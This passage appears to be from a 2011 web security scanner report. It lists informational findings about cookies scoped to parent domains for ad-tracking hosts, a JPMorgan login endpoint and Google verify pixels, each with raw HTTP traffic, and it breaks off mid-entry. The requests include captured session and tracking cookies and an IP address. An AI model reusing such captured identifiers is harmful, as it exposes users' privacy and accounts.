User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1310068527; mt_mop=5:1310068391|4:1308922018|10002:1310068527

Response

HTTP/1.1 302 Moved Temporarily
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1b3a 6970
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
ETag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Content-Length: 43
Expires: Tue, 12 Jul 2011 16:35:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 16:35:42 GMT
Connection: close
Set-Cookie: ts=1310488542; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 16:35:42 GMT
Set-Cookie: mt_mop=10001:1310488542|10002:1310068527|4:1308922018|5:1310068391; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 16:35:42 GMT
Location: http://www.homedepot.com/hdus/en_US/DTCCOM/HomePage/Images/pod01.jpg?01RI=4D0F64FD5BE586C&01CM=cm:akamai.mathtag.com&01NA=ck&

GIF89a.............!.......,...........D..;

10.9. http://akamai.turn.com/r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/C87B49F9CF448D1C1BA69C0215C3FF64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://akamai.turn.com
Path:	/r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/C87B49F9CF448D1C1BA69C0215C3FF64

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3787648658091279733; Domain=.turn.com; Expires=Sun, 08-Jan-2012 21:32:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/C87B49F9CF448D1C1BA69C0215C3FF64?rurl=4-ZoGlonpeVWkOF2PDBLGWw8jX2rf2aUXPIHvJWMiS%2fMFLEjNI3s%2f9DnATzmp95y3urXn%2fFAB%2fM1TSaBw6pqc4toFzvnQWIzORuKcqMX51pqNoIj1piOIxqohjb8%2f2MTc35k33Yetab++BMlQPEiVFOdnB4hi3nN35K8Eb4LM0krE%3d&V=3-MbpG1sgu7yHCr0MOC43F%2fUI03ub%2fbGLRcnCBrWk85VppPXUBZwjQSQ%3d%3d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: akamai.turn.com

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Content-Type: image/gif
Content-Length: 43
Expires: Tue, 12 Jul 2011 21:32:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:12 GMT
Connection: close
Set-Cookie: uid=3787648658091279733; Domain=.turn.com; Expires=Sun, 08-Jan-2012 21:32:12 GMT; Path=/
Location: http://www.lowes.com/images/my_store_more_info_greybox.gif?01RI=CE4893FA547B6E9&01CM=cm:akamai.turn.com&01NA=ck&

GIF89a.............!.......,...........D..;

10.10. http://at.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UA=AAAAAQAUcy1Eb6q7HN_gnTNnrLjvLE6pZsoDA3gBdZHNS1RhFIef8zJXHCJaGIHjRLlQZPArESeLCjfmbARB_4IRUpCRlhJmbmT6QAiSoI0VjYpaOqEIYzQtXEQLF0IgiIMIBpOQoJI6mni8zcxd3dW5933u8577Owcowrw.xGqeQKqnYHcP8ILUfvwcb8As3McKhZFgO2QaHBZ7mPUm1ZtUbzfHnl4KBbJep3od6gUd1hTBjEaw2uJIXRL.RnIsmt7vw8ReKDtA6sfgYNthO8OY6R6scDly8xGcFOTZxlAhZuYtVucscqsF_k04bNCPeRPWDP1IzTPY057_80XX_lRh5paVPUduz8DpvsPSpZrvWOcS03xzmu8kz1aGXmm.VvXatd8X9XRe2TtXHv_EvOzAunMZCWzBTirPkj.6MV_Xse6OIveWEKMzzXrJpZS7l0i7e_MZt_1FE0det_1FE79.Y7o28WxlkHLdX6o39y_.1bJxfTau7mLgomvPxbIqdWktGX7CBbjWp9c0CnhmpU4LtQVXpNjjkxLxy1U9eDAi57j0u1RoeffNPhyP2R9_arGL74NUKnu_bLOxAanWN7lxvah38LwVnAFxqaDU; Domain=.amgdgt.com; Expires=Thu, 11-Aug-2011 20:39:29 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=2762&rnd=1310503167 HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?01AD=2-2-C853333EC652166FAF7E3D0062149675759E1277B74C3E759400B711FCF64130-AD2295ECB4683944460A9D5F04A88CAF4EB4854AF4BF19B0D63B2248D4643BCA&01RI=02572381EDA0358&01NA=&m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUDr76b_h3npPQP5udtMJYvQm5U9oDA3gBdZLPSxRxGIef98vOqkQEJiGxICJ6WNBERCNR6ZJ6UAj0L1ghg1jxKOGPLrJaCoIheLGiVTF_hiGs4nbwIB08CEEQLiIYbIGCiuZm0us0u3Oa03feeeaZdz7vO8BtzPhvrEczSNkHOD4BckDK5z8uV2FWG7CaQkh1K6SqXBbtcrxZ9WbVO06zwVtNQcdrV69NvWqXPQxjJsNYj5eRijichdMskjztxkRfKTtHKqfg_JfLjkYwc8.wQiXI_edw6c.wvYFszOIbrPYl5EEj_J1x2YsAZiKkGXqQe0Nwoj3_54t8PyzFrGwre4nULMLVqcuShZrvj84lqvlWNN9lhu0MjGm.FvVatd.6ejov5507vV8xo21YtXlI8ACOEhkW__IUs7GLVTeJ1G8iRmfqePHNhLcXS3p7n1Je.4vELnK89heJ_fiJ6djHd5BCSnR_ic70twS.FU_rtfF014I3PXuuFZeqS_PVcD83oKBbigR8SxLQg3IfYvn9kqXFk9c2KtySXK3efrZvTkftBxca7ePue7mj7N22zab6JF8r58e87sI_BrShaw--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUcy1Eb6q7HN_gnTNnrLjvLE6pZsoDA3gBdZHNS1RhFIef8zJXHCJaGIHjRLlQZPArESeLCjfmbARB_4IRUpCRlhJmbmT6QAiSoI0VjYpaOqEIYzQtXEQLF0IgiIMIBpOQoJI6mni8zcxd3dW5933u8577Owcowrw.xGqeQKqnYHcP8ILUfvwcb8As3McKhZFgO2QaHBZ7mPUm1ZtUbzfHnl4KBbJep3od6gUd1hTBjEaw2uJIXRL.RnIsmt7vw8ReKDtA6sfgYNthO8OY6R6scDly8xGcFOTZxlAhZuYtVucscqsF_k04bNCPeRPWDP1IzTPY057_80XX_lRh5paVPUduz8DpvsPSpZrvWOcS03xzmu8kz1aGXmm.VvXatd8X9XRe2TtXHv_EvOzAunMZCWzBTirPkj.6MV_Xse6OIveWEKMzzXrJpZS7l0i7e_MZt_1FE0det_1FE79.Y7o28WxlkHLdX6o39y_.1bJxfTau7mLgomvPxbIqdWktGX7CBbjWp9c0CnhmpU4LtQVXpNjjkxLxy1U9eDAi57j0u1RoeffNPhyP2R9_arGL74NUKnu_bLOxAanWN7lxvah38LwVnAFxqaDU; Domain=.amgdgt.com; Expires=Thu, 11-Aug-2011 20:39:29 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://cdn.amgdgt.com/base/pixels/transparent.gif
Content-Length: 0
Date: Tue, 12 Jul 2011 20:39:28 GMT

10.11. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 11-Jul-2013 20:46:59 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=7518284&rn=934038782&c7=http%3A%2F%2Fblog.katango.com%2F&c8=Katango%20Blog%20%7C%20Trends%20and%20insights%20on%20personal%2&c9=http%3A%2F%2Fprod-apache-load-balancer-782580564.us-west-1.elb.amazonaws.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://blog.katango.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 12 Jul 2011 20:46:59 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 11-Jul-2013 20:46:59 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

10.12. http://bh.contextweb.com/bh/set.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 06-Jul-2012 21:30:51 GMT; Path=/
cwbh1=357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A1443%3B07%2F26%2F2011%3BNETM7%0A2996%3B08%2F11%2F2011%3BLOW21; Domain=.contextweb.com; Expires=Wed, 15-Jun-2016 21:30:51 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.13. http://bstats.adbrite.com/click/bstats.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/click/bstats.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ut="1%3AVZJJkoQgFETvwtoFoKL2bRQHHFAGLdSi7t4MRkfX9kW%2BnxkEb%2FDC4OcN5u4ym2o1%2BAG65FdrkapFmlpkYSI03S8H1LDPAVC2kPEi3cuiHWYi%2Fw%2Bz1SUXVtYB%2Blt1uAVNAOpW0t066o6cNrW4LmD9qPns6vZrpuxRe8KdanjVR9DLJQ%2BgFRHI5cicghpTRpDCk%2FjEiuNyeUymskjTnDcRiIJvTqG66KKCZBUU3qk4cO3pM3Cw2OIbLl0iq%2B10Fapppy2mzML3oB1xnJTt7dbqTKBn3Hgw35QRPf0pMoxDcZyi1L%2BzPqeqeV6QlYOETPjUeOdfcPuGU8EMx76AwKdAD%2BqiDhSvUcYCnkr%2FgopxbDOr%2B0TnYguH%2BBojmkxTqOMMewAS0NTr2qkxfAXw%2BfwC"; path=/; domain=.adbrite.com; expires=Fri, 09-Jul-2021 20:40:09 GMT
vsd=0@3@4e1cb129@www.imiclk.com; path=/; domain=.adbrite.com; expires=Thu, 14-Jul-2011 20:40:09 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/bstats.gif?kid=47018554&bapid=9470 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:762701:20861280:E3F32BD05A8DDF4D5646D79640088B:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MtDJSMoyqkkvyKoqTy5IrjG0MizJqyjIsDK1MszPq1CqBQA%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=Ci4KBjc2MjcwMRi9rereJiIeRTNGMzJCRDA1QThEREY0RDU2NDZENzk2NDAwODhCEAE; ut="1%3AVZJJsoMgFEX3wtgBoqJmN4oNoiiNhmjI3j%2BN9SuZnrrn3VsUb%2FBE4PEGc3%2BaTXUaPICu%2BNnZVDUiy2xqYSI02U8H1LjPARC64OnE%2FdOmO8xF8Q3z1SUXWjUB%2BltNuAVNAOpS0t3SsMTrl1bMrmo%2FZ0JvbcDcaYbXQwSDXIoAOhGBXI7cKWlrqggy%2BMI%2BsaK4Wh7M1K6JFLyNQJR8cwrRZR%2BVVNZB4b2K49aBuHFH0%2BPRIosuuPSJrLeXq1Btx7aYMgvfg3bEcVJ2l1urc5He46aD%2BqYca%2FavyDAujeMUIf6N9YvV7f0MtBolpMKnpqv4gdsvZCU1HPkCDO8CPaqTOFA%2BJxkLeCb9CyrKkc2tHhJdiC0c4muMaMxYqOMUeQAS0Dbr2qspfAPw%2BfwB"; vsd=0@1@4e1cb118@www.imiclk.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJkoQgFETvwtoFoKL2bRQHHFAGLdSi7t4MRkfX9kW%2BnxkEb%2FDC4OcN5u4ym2o1%2BAG65FdrkapFmlpkYSI03S8H1LDPAVC2kPEi3cuiHWYi%2Fw%2Bz1SUXVtYB%2Blt1uAVNAOpW0t066o6cNrW4LmD9qPns6vZrpuxRe8KdanjVR9DLJQ%2BgFRHI5cicghpTRpDCk%2FjEiuNyeUymskjTnDcRiIJvTqG66KKCZBUU3qk4cO3pM3Cw2OIbLl0iq%2B10Fapppy2mzML3oB1xnJTt7dbqTKBn3Hgw35QRPf0pMoxDcZyi1L%2BzPqeqeV6QlYOETPjUeOdfcPuGU8EMx76AwKdAD%2BqiDhSvUcYCnkr%2FgopxbDOr%2B0TnYguH%2BBojmkxTqOMMewAS0NTr2qkxfAXw%2BfwC"; path=/; domain=.adbrite.com; expires=Fri, 09-Jul-2021 20:40:09 GMT
Set-Cookie: vsd=0@3@4e1cb129@www.imiclk.com; path=/; domain=.adbrite.com; expires=Thu, 14-Jul-2011 20:40:09 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 12 Jul 2011 20:40:09 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

10.14. https://iblogin.jpmorgan.com/sso/action/federateLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://iblogin.jpmorgan.com
Path:	/sso/action/federateLogin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pajpm5=sailSession; Domain=.jpmorgan.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sso/action/federateLogin?URI=https%3a%2f%2fmorcom.jpmorgan.com%2fIB%2fPostTrade%2fMORCOM&msg=+&securityLevel=300&ignorespnego=true&app=254651&ref=289733&cs=sYFeaoWWJKVj2jkatj0PGjSkwwc%3d HTTP/1.1
Host: iblogin.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pajpm1-temp="Tue Jul 12 12:29:11 EDT 2011"; JSESSIONID=CE57AB5A9A7C046C70A540F049D96361; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:29:17 GMT
Server: Apache
Set-Cookie: pajpm5=sailSession; Domain=.jpmorgan.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 10225

                   <SCRIPT type="text/javascript">
<!--
   var cookieEnabled=(navigator.cookieEnabled)? true : false
   //if not IE4+ nor NS6+
   if (typeof navigator.cooki
...[SNIP]...

10.15. http://id.google.com/verify/EAAAAAA8ZuvsS7JEKK-IQjYnqI0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAAA8ZuvsS7JEKK-IQjYnqI0.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=48=JND5NXvsSmFsBYvmrygMdzkGQswKJjIx-ckH2uK2OSHREX1f2o6ny0zTZ4mCnyT28X86cgIb7E2AtI99MfwKIztxvmcPwEEnk_nEBgeTgALZ0eooxulD-TiqDrXhRemv; expires=Wed, 11-Jan-2012 20:41:01 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAAA8ZuvsS7JEKK-IQjYnqI0.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=adobe+psirt+web+server+security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=JlF2Ve9cr9tNyLD4ZI8Hh8Zm9dmJGlgzHtojDX0u=XNCKdN_4bGk7uLcn; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=PrTm1sPBV8WcGKUpX24DX5FxWwEiYnRIQG1U8UDSmVNfNlXO4RsMbeCllROY8jurLY0nQ0ao8uAFMmNgXjVJP4Qp83yBr8GEcfw9vqYyVe1aEd9Jnty9TfIHuCmfrKOA

Response

HTTP/1.1 200 OK
Set-Cookie: NID=48=JND5NXvsSmFsBYvmrygMdzkGQswKJjIx-ckH2uK2OSHREX1f2o6ny0zTZ4mCnyT28X86cgIb7E2AtI99MfwKIztxvmcPwEEnk_nEBgeTgALZ0eooxulD-TiqDrXhRemv; expires=Wed, 11-Jan-2012 20:41:01 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:41:01 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.16. http://id.google.com/verify/EAAAAB5TmvHS4JtvGgryw3OQbj8.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAB5TmvHS4JtvGgryw3OQbj8.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=48=JlF2Ve9cr9tNyLD4ZI8Hh8Zm9dmJGlgzHtojDX0u=XNCKdN_4bGk7uLcn; expires=Wed, 11-Jan-2012 20:40:09 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAB5TmvHS4JtvGgryw3OQbj8.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=adobe+psirt
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=vgu7nJh0OOj_R3rfoTk_2iy3JQ0c3cKwGSV1uXyt=TzKGQ_4u__SbdsyK; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=PrTm1sPBV8WcGKUpX24DX5FxWwEiYnRIQG1U8UDSmVNfNlXO4RsMbeCllROY8jurLY0nQ0ao8uAFMmNgXjVJP4Qp83yBr8GEcfw9vqYyVe1aEd9Jnty9TfIHuCmfrKOA

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=JlF2Ve9cr9tNyLD4ZI8Hh8Zm9dmJGlgzHtojDX0u=XNCKdN_4bGk7uLcn; expires=Wed, 11-Jan-2012 20:40:09 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:40:09 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.17. http://id.google.com/verify/EAAAALupUYoUPVshUibYW8x6f5I.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAALupUYoUPVshUibYW8x6f5I.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=48=G8GXu_mu_V4v5YxE2RqVYl3gQcYLRg30PTyN25cOw1cLTLBKpupiwM_D9n2e3-VyC48S_mOn73wfajzGDfFiwn12C9Ufm9LtLqm9u-FMzXndz4J5LJqChVjL88zMCKHU; expires=Thu, 12-Jan-2012 00:37:19 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAALupUYoUPVshUibYW8x6f5I.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://511.dot.ri.gov/hb/main.jsf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=JlF2Ve9cr9tNyLD4ZI8Hh8Zm9dmJGlgzHtojDX0u=XNCKdN_4bGk7uLcn; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=JND5NXvsSmFsBYvmrygMdzkGQswKJjIx-ckH2uK2OSHREX1f2o6ny0zTZ4mCnyT28X86cgIb7E2AtI99MfwKIztxvmcPwEEnk_nEBgeTgALZ0eooxulD-TiqDrXhRemv

Response

HTTP/1.1 200 OK
Set-Cookie: NID=48=G8GXu_mu_V4v5YxE2RqVYl3gQcYLRg30PTyN25cOw1cLTLBKpupiwM_D9n2e3-VyC48S_mOn73wfajzGDfFiwn12C9Ufm9LtLqm9u-FMzXndz4J5LJqChVjL88zMCKHU; expires=Thu, 12-Jan-2012 00:37:19 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Wed, 13 Jul 2011 00:37:19 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.18. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=9622=734271&9000=734271&570=734271&410=734329&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323&11206=734324&7382=734325; domain=.interclick.com; expires=Mon, 12-Jul-2021 20:39:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=9afcf94a-90e6-425e-a175-116aed2ea643&cacheBust=1310503167 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?01AD=2-2-C853333EC652166FAF7E3D0062149675759E1277B74C3E759400B711FCF64130-AD2295ECB4683944460A9D5F04A88CAF4EB4854AF4BF19B0D63B2248D4643BCA&01RI=02572381EDA0358&01NA=&m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; tpd=e20=1311819163224&e90=1309831963205&e50=1311819163964&e100=1309831963322; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323&11206=734324&7382=734325

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734329&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323&11206=734324&7382=734325; domain=.interclick.com; expires=Mon, 12-Jul-2021 20:39:29 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 12 Jul 2011 20:39:29 GMT

GIF89a.............!.......,...........D..;

10.19. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

